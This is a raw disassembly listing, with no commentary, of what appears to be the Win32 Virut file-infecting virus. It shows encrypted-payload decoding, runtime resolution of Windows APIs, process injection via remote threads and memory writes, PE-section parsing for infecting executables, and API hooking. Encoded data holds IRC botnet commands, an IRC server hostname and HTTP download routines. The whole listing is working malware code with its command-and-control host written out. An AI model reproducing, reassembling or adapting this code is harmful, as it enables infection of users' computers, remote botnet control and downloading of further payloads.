mov [ecx], al
add ecx, 1
inc ebx
sub edx, 1
or edx, edx
jnz short loc_30909913
pop ecx
xchg ebp, fs:0
mov esp, ebp
pop dword ptr fs:0
lea ebp, [ebp+8]
leave
jmp ecx
sub_30909891 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
sub_3090993B proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_3090993B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
db 0E8h, 2 dup(0)
dd 48B0000h, 2B80F724h, 24h, 89800000h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_30909891
loc_3090995C: ; CODE XREF: sub_30909891+62�j
cwde
lodsb
sub [eax], eax
add [ebx+7404245Ch], cl
sub eax, 0B08959FCh
mov al, 29h
; END OF FUNCTION CHUNK FOR sub_30909891
; ---------------------------------------------------------------------------
db 2 dup(0), 89h
; ---------------------------------------------------------------------------
mov eax, 29B4h
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_3090998B
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_30909993
; ---------------------------------------------------------------------------
loc_3090998B: ; CODE XREF: UPX2:3090997C�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_30909993: ; CODE XREF: UPX2:30909989�j
pop ebx
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 274Eh
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_309099BB: ; CODE XREF: UPX2:309099D7�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_309099D1
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_309099D9
loc_309099D1: ; CODE XREF: UPX2:309099C2�j
sub ebx, 100h
jnz short loc_309099BB
loc_309099D9: ; CODE XREF: UPX2:309099CF�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_309099E7: ; CODE XREF: UPX2:loc_30909A0E�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_30909A0E
cmp dword ptr [eax+3], 636F7250h
jnz short loc_30909A0E
cmp dword ptr [eax+7], 72646441h
jnz short loc_30909A0E
cmp dword ptr [eax+0Bh], 737365h
jz short loc_30909A13
loc_30909A0E: ; CODE XREF: UPX2:309099F1�j
; UPX2:309099FA�j ...
loop loc_309099E7
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_30909A13: ; CODE XREF: UPX2:30909A0C�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_30909A39+2
inc ebx
insb
outsd
jnb short near ptr loc_30909A97+2
dec eax
popa
outsb
db 64h
insb
loc_30909A39: ; CODE XREF: UPX2:30909A2A�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_30909A55+1
inc ebx
jb short near ptr loc_30909AB0+1
popa
jz short near ptr loc_30909AB0+4
inc ebp
jbe short near ptr loc_30909AB6+1
outsb
jz short near ptr loc_30909A94+2
loc_30909A55: ; CODE XREF: UPX2:30909A44�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_30909A71
inc edi
db 65h
jz short near ptr loc_30909AB0+4
popa
jnb short loc_30909ADF
inc ebp
jb short near ptr loc_30909ADF+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_30909A71 proc near ; CODE XREF: UPX2:30909A5F�p
; FUNCTION CHUNK AT 30909B1A SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 30909C5A SIZE 0000013A BYTES
push ebx
call esi ; lstrcatA
mov [ebp+403544h], eax
call sub_30909AEF
test eax, eax
jz short loc_30909AA4
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_30909A9E
lea eax, [ebp+4011D2h]
loc_30909A94: ; CODE XREF: UPX2:30909A53�j
mov dl, [eax-1]
loc_30909A97: ; CODE XREF: UPX2:30909A32�j
call sub_30909B0A
jmp short loc_30909B1A
; ---------------------------------------------------------------------------
loc_30909A9E: ; CODE XREF: sub_30909A71+1B�j
; sub_30909A71+136�j ...
call dword ptr [ebp+40353Ch]
loc_30909AA4: ; CODE XREF: sub_30909A71+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_30909ACE
loc_30909AB0: ; CODE XREF: UPX2:30909A4A�j
; UPX2:30909A4D�j ...
lea esi, [ebp+403435h]
loc_30909AB6: ; CODE XREF: UPX2:30909A50�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_30909ACE: ; CODE XREF: sub_30909A71+3D�j
pop ebp
retn
sub_30909A71 endp
; ---------------------------------------------------------------------------
loc_30909AD0: ; CODE XREF: sub_30909AEF+2�p
; sub_30909A71:loc_30909CD9�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_30909ADF: ; CODE XREF: UPX2:30909A69�j
; UPX2:30909A6C�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
db 0
; =============== S U B R O U T I N E =======================================
sub_30909AEF proc near ; CODE XREF: sub_30909A71+9�p
; UPX2:loc_3090A794�p
xor ecx, ecx
call loc_30909AD0
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_30909AEF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_30909B0A proc near ; CODE XREF: sub_30909A71:loc_30909A97�p
; sub_3090B8DE+25B�p
mov dh, dl
mov ecx, 225Fh
loc_30909B11: ; CODE XREF: sub_30909B0A+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_30909B11
retn
sub_30909B0A endp
; ---------------------------------------------------------------------------
db 82h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_30909A71
loc_30909B1A: ; CODE XREF: sub_30909A71+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_30909B41: ; CODE XREF: sub_30909A71+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_30909B41
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_30909ED4
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_30909C5A
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_30909A9E
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A74h
sub ebp, 401000h
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_30909A71
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_30909A9E
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_30909A9E
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_30909C4A
jmp loc_30909A9E
; =============== S U B R O U T I N E =======================================
sub_30909C4A proc near ; CODE XREF: UPX2:30909C40�p
; sub_30909C4A+D�j
push 1
pop ecx
jecxz short locret_30909C59
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_30909C4A
; ---------------------------------------------------------------------------
locret_30909C59: ; CODE XREF: sub_30909C4A+3�j
retn
sub_30909C4A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_30909A71
loc_30909C5A: ; CODE XREF: sub_30909A71+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_30909A9E
call near ptr loc_30909C71+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_30909C71: ; CODE XREF: sub_30909A71+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_30909C8E+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_30909ED4
loc_30909C8E: ; CODE XREF: sub_30909A71+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_30909A9E
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_30909CD9
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_30909CD9: ; CODE XREF: sub_30909A71+25D�j
call loc_30909AD0
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_30909D1E: ; CODE XREF: sub_30909A71+2B0�j
lodsb
stosw
loop loc_30909D1E
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_30909A9E
lea esi, [ebp+401000h]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_30909A71
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h, 0E0h, 18h
db 40h ; @
align 2
dw 0FF52h
db 95h ;
db 9Ch, 35h, 40h
db 0
db 0E8h, 16h, 0
db 0
align 2
aLookupprivil_0 db 'LookupPrivilegeValueA',0
dd 4895FF50h, 89004035h, 40354C85h, 6A545000h, 0FFFF6A20h
dd 4035EC95h, 5FC08500h, 6A963F75h, 8B565602h, 52016AD4h
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0FF560065h
dd 40354C95h, 56C48B00h, 56505656h, 0D095FF57h, 83004035h
dd 0FF5710C4h, 40353C95h, 6A006A00h, 7095FF02h, 0B9004035h
dd 128h, 89E12B97h, 5754240Ch, 35AC95FFh, 0F6330040h, 363CA583h
dd 54000040h, 0B095FF57h, 85004035h, 465C74C0h, 7204FE83h
dd 2474FFEEh, 6A006A08h, 0A895FF2Ah, 85004035h, 93DC74C0h
dd 43DE8h, 91C93300h, 853930E3h, 40363Ch, 0C1812875h, 0DAEh
dd 56505450h, 53505051h, 356895FFh, 0C0850040h, 0FF0F7459h
dd 8F082474h, 40363C85h, 0FDACE800h, 0FF53FFFFh, 40353C95h
dd 8198EB00h, 128C4h, 95FF5700h, 40353Ch, 0FFFBE5E9h, 498DFFh
dd 585858h, 29CEh, 0D65h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_30909ED4 proc near ; CODE XREF: sub_30909A71+100�p
; sub_30909A71+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_30909EDF: ; CODE XREF: sub_30909ED4+E�j
lodsb
test al, al
jnz short loc_30909EDF
loop sub_30909ED4
retn
sub_30909ED4 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_3090A26F proc near ; CODE XREF: UPX2:3090A316�p
; UPX2:3090A327�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_3090A26F endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_3090A352
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_3090A352
mov ecx, [ebp+401588h]
jecxz short loc_3090A30A
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_3090A30A: ; CODE XREF: UPX2:3090A2FC�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_3090A26F
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_3090A26F
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_3090A26F
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_3090A352
lea ecx, [edi+23F5h]
call sub_3090A26F
loc_3090A352: ; CODE XREF: UPX2:3090A2BC�j
; UPX2:3090A2F4�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1A43ED81h, 0FF6A0040h, 1A0E958Dh, 52500040h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 401A54h, 85C720CDh
dd 401A56h, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
dd 0B68F0h, 0D08B0000h, 3C50035Bh, 1A72B58Dh, 0BA8B0040h
dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h, 0FF6A5251h
dd 35F095FFh, 0C4830040h, 74958B0Ch, 2B004035h, 7EA83D7h
dd 6A07C7h, 578900E8h, 1A6AC303h, 9E858h, 428D0000h, 0C9FEAA61h
db 75h, 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_3090A437 proc near ; CODE XREF: sub_3090ACA2+1B�p
; sub_3090AE1A+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_3090A437 endp
; ---------------------------------------------------------------------------
db 55h
dd 0E8h, 0ED815D00h, 401B09h, 364A9D8Bh, 7C830040h, 0F000824h
dd 0B984h, 8EC8100h, 54000002h, 10468h, 9095FF00h, 8B004035h
dd 24848DFCh, 104h, 0E8006A50h, 4, 545256h, 8C95FF57h
dd 33004035h, 4978DC9h, 51000001h, 51026A51h, 68016Ah
dd 52400000h, 355C95FFh, 85960040h, 505B74F6h, 1046854h
dd 0FF570000h, 22024B4h, 95FF0000h, 403628h, 74C08559h
dd 5014E316h, 6AD48Bh, 56575152h, 35CC95FFh, 85590040h
dd 56D075C0h, 353C95FFh, 578D0040h, 6A575244h, 978D5844h
dd 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h, 356495FFh
dd 0C4810040h, 208h, 82474FFh, 361895FFh, 0FF530040h, 40361895h
dd 4C25D00h, 0A3E8000h, 8B460175h, 4015848Dh, 8D19E300h
dd 40100095h, 56D10300h, 0C084D2FFh, 11F880Fh, 840F0000h
dd 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h, 0F175203Eh
dd 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h, 6A51CEh
dd 0FF535651h, 40361095h, 0C13B5900h, 0DF850Fh, 858D0000h
dd 401DA2h, 0C68006Ah, 50000000h, 1095FF53h, 3D004036h
dd 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh, 0A5850F56h
dd 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h, 0ACF37520h
dd 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h, 203CAC7Fh
dd 7E817C75h, 746820FFh, 81717574h, 3A70037Eh, 68752F2Fh
dd 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h, 4035BCh
dd 5050C033h, 9E85050h, 44000000h, 6C6E776Fh, 64616Fh
dd 362095FFh, 0C0850040h, 0C9333674h, 364A8589h, 68510040h
dd 80000200h, 50565151h, 362495FFh, 958D0040h, 401B03h
dd 54C93350h, 51525051h, 6C95FF51h, 87004035h, 95FF2404h
dd 40353Ch, 8D80C3F8h, 401577h, 53C3F901h, 5754464Fh, 5C455241h
dd 7263694Dh, 666F736Fh, 69575C74h, 776F646Eh, 75435C73h
dd 6E657272h, 72655674h, 6E6F6973h, 7078455Ch, 65726F6Ch
dd 61540072h, 74656772h, 74736F48h, 0FF000200h, 7FF0h
dd 6F727001h, 2E6D6978h, 67637269h, 78616C61h, 6C702E79h
dd 43494E00h, 6E73204Bh, 69696766h, 550A6667h, 20524553h
dd 3032306Ah, 20313035h, 202E202Eh, 4F4A2D3Ah, 26204E49h
dd 74726976h, 0E8550A75h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 401DB4h
mov byte ptr [ebp+401577h], 0
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz short loc_3090A751
push 1Eh
mov esi, [ebp+403550h]
pop ecx
loc_3090A71E: ; CODE XREF: UPX2:loc_3090A74D�j
lodsb
cmp al, 2Eh
jnz short loc_3090A74D
cmp word ptr [esi], 1DFFh
jnz short loc_3090A74D
lea edi, [ebp+403640h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+40336Ah]
pop dword ptr [ebp+403390h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_3090A74D: ; CODE XREF: UPX2:3090A721�j
; UPX2:3090A728�j
loop loc_3090A71E
jmp short loc_3090A794
; ---------------------------------------------------------------------------
loc_3090A751: ; CODE XREF: UPX2:3090A713�j
lea eax, [ebp+4015B1h]
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
cmp dword ptr [esp+8], 4
jnz short loc_3090A794
call near ptr loc_3090A771+1
push ebx
inc esi
inc ebx
loc_3090A771: ; CODE XREF: UPX2:3090A769�p
add bh, bh
xchg eax, ebp
mov ds:48E80040h, dh
cld
; ---------------------------------------------------------------------------
db 0FFh
dd 7E8FFh, 46530000h, 534F5F43h, 8895FF00h, 0E8004035h
dd 0FFFFFC31h
; ---------------------------------------------------------------------------
loc_3090A794: ; CODE XREF: UPX2:3090A74F�j
; UPX2:3090A767�j
call sub_30909AEF
dec dword ptr [ebp+401303h]
call near ptr loc_3090A7AE+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3090A7AE: ; CODE XREF: UPX2:3090A79F�p
add bh, bh
xchg eax, ebp
pushf
xor eax, 0AE80040h
; ---------------------------------------------------------------------------
db 0
dd 73770000h, 6E697270h, 416674h, 4895FF50h, 89004035h
dd 40355485h, 8D310F00h, 4018E08Dh, 46858900h, 51004036h
dd 359C95FFh, 68930040h, 4, 18EDB58Dh, 8D590040h, 40362CBDh
dd 0F6D6E800h, 0C766FFFFh, 401D6785h, 83F0FF00h, 401D69A5h
dd 958D0000h, 401D27h, 16A5450h, 6852006Ah, 80000002h
dd 363095FFh, 0C0850040h, 8D22755Ah, 401D5A8Dh, 66A5200h
dd 1D67B58Dh, 56540040h, 52515050h, 363495FFh, 0FF580040h
dd 40362C95h, 4D85C600h, 4038h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 9C95FF00h, 93004035h, 768h, 44B58D00h, 59004018h
dd 35FCBD8Dh, 51E80040h, 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh
dd 4C4C44h, 359C95FFh, 0C0850040h, 1E7840Fh, 68930000h
dd 5, 1882B58Dh, 8D590040h, 403618BDh, 0F61AE800h, 0BD83FFFFh
dd 40361Ch, 0C2840F00h, 81000001h, 190ECh, 1685400h, 0FF000001h
dd 4035FC95h, 90C48100h, 50000001h, 6AD48Bh, 1C95FF52h
dd 85004036h, 0D7559C0h, 138868h, 0BC95FF00h, 0EB004035h
dd 69BD83E2h, 401Dh, 858D2975h, 401D6Dh, 895FF50h, 85004036h
dd 3B840FC0h, 8B000001h, 8B0C40h, 858F30FFh, 401D69h, 384D85C6h
dd 6A010040h, 6A016A00h, 1495FF02h, 83004036h, 840FFFF8h
dd 112h, 65958D93h, 6A00401Dh, 0FF535210h, 40360495h, 0FC08500h
dd 0F285h, 86BD8D00h, 0B100401Dh, 0FABCE808h, 9468FFFFh
dd 5E000000h, 3489E62Bh, 95FF5424h, 403598h, 1D94BD8Dh
dd 1B10040h, 0FFFA9DE8h, 24448BFFh, 8E0C110h, 424440Bh
dd 0B08E0C1h, 50082444h, 5E8h, 362E2500h, 0FF570078h, 40355495h
dd 0CC48300h, 200647C6h, 1D81958Dh, 6A0040h, 2168h, 0FF535200h
dd 40361095h, 247C8D00h, 95FF5714h, 403558h, 0A3804C6h
dd 50006A40h, 95FF5357h, 403610h, 0BD8DE603h, 401DA2h
dd 0C68006Ah, 57000000h, 1095FF53h, 3D004036h, 0Ch, 0B58D4D75h
dd 40364Eh, 384D8D8Dh, 0CE2B0040h, 5651006Ah, 0C95FF53h
dd 83004036h, 2F7E00F8h, 8DFE8B91h, 40364EB5h, 0F20DB000h
dd 601075AEh, 0FFFAF8E8h, 177261FFh, 778D09E3h, 8BEAEB01h
dd 8DCE2BCFh, 40364EBDh, 87A4F300h, 53B9EBF7h, 360095FFh
dd 0BD800040h, 401577h, 682A7401h, 7530h, 35BC95FFh, 0BD800040h
dd 40384Dh, 0C7117400h, 401D6985h, 0
dd 4D85C600h, 4038h, 0FFFE56E9h, 8085C7FFh, 4015h, 5D800000h
dd 0D0004C2h, 6E204F0Ah, 206E6F6Fh, 6C20666Fh, 21656669h
dd 74204F20h, 20656D69h, 63206F74h, 62656C65h, 65746172h
dd 200A0D21h, 20202020h, 7573204Fh, 72656D6Dh, 72616720h
dd 216E6564h, 65520A0Dh, 746E656Ch, 7373656Ch, 6820796Ch
dd 79707061h, 646E6120h, 70786520h, 61746365h, 202C746Eh
dd 6E617473h, 676E6964h, 0D2D203Ah, 7461570Ah, 6E696863h
dd 6C612067h, 6164206Ch, 6E612079h, 696E2064h, 2C746867h
dd 726F6620h, 69726620h, 73646E65h, 77204920h, 3A746961h
dd 68570A0Dh, 20657265h, 20657261h, 2C756F79h, 69726620h
dd 73646E65h, 6F43203Fh, 2021656Dh, 69207449h, 69742073h
dd 2021656Dh, 73277449h, 74616C20h, 0A0D2165h, 30C78404h
dd 10A61429h, 4FD479EDh, 3AAB5957h, 6299AD47h, 0CE9A3A2h
dd 40375248h, 606E7FAFh, 53B81D98h, 606EF96Ah, 27B1FAE5h
dd 10A61413h, 1A73C17Eh, 10EBD944h, 0ABFC74C9h, 0D8B8B352h
dd 10h dup(0)
; =============== S U B R O U T I N E =======================================
sub_3090ABEC proc near ; CODE XREF: sub_3090AC33:loc_3090AC90�p
; sub_3090ACF3+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3090AC08: ; CODE XREF: sub_3090ABEC+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3090AC2A
cmp eax, [edx+8]
jnb short loc_3090AC2A
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_3090AC2F
; ---------------------------------------------------------------------------
loc_3090AC2A: ; CODE XREF: sub_3090ABEC+23�j
; sub_3090ABEC+28�j
add edx, 28h
loop loc_3090AC08
loc_3090AC2F: ; CODE XREF: sub_3090ABEC+3C�j
popa
retn 4
sub_3090ABEC endp
; =============== S U B R O U T I N E =======================================
sub_3090AC33 proc near ; CODE XREF: UPX2:3090AF5F�p
; UPX2:3090AF85�p
mov [ebp+4022F7h], al
call sub_3090ACA2
push 1Fh
lea eax, [ebp+402224h]
pop ecx
loc_3090AC4A: ; CODE XREF: sub_3090AC33+1E�j
cmp [eax], ebx
jz short loc_3090AC5A
add eax, 4
loop loc_3090AC4A
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_3090AC5A: ; CODE XREF: sub_3090AC33+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_3090AC74
loc_3090AC64: ; CODE XREF: sub_3090AC33+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3090AC64
mov [ebp+402224h], ebx
loc_3090AC74: ; CODE XREF: sub_3090AC33+2F�j
; sub_3090ACA2+34�j
cmp dword ptr [edx], 0
jz short loc_3090AC7E
sub esi, [edx]
add esi, [edx+10h]
loc_3090AC7E: ; CODE XREF: sub_3090AC33+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3090AC8D
push dword ptr [edx]
jmp short loc_3090AC90
; ---------------------------------------------------------------------------
loc_3090AC8D: ; CODE XREF: sub_3090AC33+54�j
push dword ptr [edx+10h]
loc_3090AC90: ; CODE XREF: sub_3090AC33+58�j
call sub_3090ABEC
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_3090AC33 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3090ACA2 proc near ; CODE XREF: sub_3090AC33+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_3090ACF3
mov eax, [ebp+40398Eh]
call sub_3090A437
call sub_3090ACDF
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_3090ACD8
